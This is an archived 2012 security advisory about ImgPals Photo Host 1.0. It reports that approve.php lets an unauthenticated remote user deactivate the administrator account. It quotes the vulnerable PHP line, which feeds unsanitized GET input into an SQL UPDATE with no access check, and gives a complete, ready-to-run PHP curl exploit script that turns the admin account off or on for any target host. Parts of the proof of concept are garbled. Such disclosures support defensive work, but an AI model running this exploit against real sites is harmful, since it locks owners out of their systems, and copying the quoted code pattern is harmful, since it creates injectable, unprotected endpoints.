ImgPals Photo Host Version 1.0 Admin Account Disactivation

2012-03-19T00:00:00
ID SECURITYVULNS:DOC:27803
Type securityvulns
Reporter Securityvulns
Modified 2012-03-19T00:00:00

Description

-=[--------------------ADVISORY-------------------]=-

ImgPals Photo Host Version 1.0 STABLE

Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] -=[-----------------------------------------------]=-

-=[+] Application: ImgPals Photo Host -=[+] Version: 1.0 STABLE -=[+] Vendor's URL: http://www.imgpals.com/forum/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Admin Account Disactivation -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

..::[ Descriprion ]::..

I released the ImgPals Photo Host Version 1.0 STABLE

Features Include:

* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
      o Multiple JQuery Uploads
      o Create and Edit Photo Albums
      o Make Albums Public or Private
      o Describe Albums and Photos
      o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
      o Add Friends
      o Chat with Friends
      o Update people with status wall posting
      o Manage Profile
      o Profile Avatar Uploads
      o Private Messaging
* And much more, be sure to check out the Demo

..::[ Bug ]::..

A attaker can remotely disable the account from administratore not allowing the same to be able to access the site

..::[ Proof Of Concept ]::..

if ($_GET['a'] == 'app0'){ $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'");

by sending the command approve.php? u = a = 1 & app0 a attaker can disable the Administrator account.

..::[ Exploit ]::..

!/usr/bin/php -f

<?php

//Coded by Corrado Liotta For educational purpose only //use php exploit.php server app0 or app1 //use app0 for admin account off //use app1 for admin account on

$target = $argv[1]; $power = $argv[2]

$ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch);

echo $buf; ?>